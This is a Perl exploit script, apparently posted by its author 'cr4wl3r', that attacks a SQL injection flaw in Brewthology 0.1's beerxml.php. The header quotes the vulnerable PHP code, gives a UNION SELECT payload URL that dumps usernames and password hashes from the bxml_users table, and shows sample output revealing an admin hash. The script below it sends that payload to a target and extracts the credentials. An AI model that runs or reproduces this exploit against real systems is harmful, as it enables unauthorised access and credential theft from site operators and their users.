#Brewthology 0.1 SQL Injection Exploit
#By cr4wl3r http://bastardlabs.info
#Script: http://sourceforge.net/projects/brewthology/files/brewthology/v0.1%20public%20beta/
#Demo: http://bastardlabs.info/demo/brewthology.png
#Tested: Win 7
#
# Bugs found in beerxml.php
#
# if (isset($_GET['r']))
# {
# $recipenum = $_GET['r'];
#
# // Pull Data from DB
# $recipes = "SELECT * FROM bxml_recipes WHERE reciperecid=$recipenum";
# $recresult = @mysql_query ($recipes);
# }
#
# http://bastardlabs/[path]/beerxml.php?r=[SQLi]
# Example: http://bastardlabs/[path]/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users
#
#
# $ perl brewthology.pl localhost /demo/
# [+] Please Wait ...
#
# [+] Getting Username and Password [ ok ]
# [+] w00tw00t
# [+] Username | Password --> admin:ab4d8d2a5f480a137067da17100271cd176607a1
#!/usr/bin/perl
use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
if (@ARGV < 2) {
print qq(
+---------------------------------------------+
| Brewthology 0.1 SQL Injection Exploit |
| |
| coded & exploited by cr4wl3r |
| http://bastardlabs.info/ |
+---------------------------------------------+
-=[X]=-
+---------------------------------------
Usage :
perl $0 <host> <path>
ex : perl $0 127.0.0.1 /Brewthology/
+---------------------------------------
);
}
$target = "http://".$host.$path."/beerxml.php?r=null%20union%20select%201,2,3,4,5,concat(username,0x3a,userpass),7,8,9,10,11%20from%20bxml_users";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",
PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n";
print "[+] Please Wait ...\n";
print $sock "GET $target HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: BastardLabs\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
sleep 2;
while ($answer = <$sock>) {
if ($answer =~ /<USE>(.*?)<\/USE>/) {
print "\n[+] Getting Username and Password [ ok ]\n";
sleep 1;
print "[+] w00tw00t\n";
print "[+] Username | Password --> $1\n";
exit();
}
}
print "[-] Exploit Failed !\n";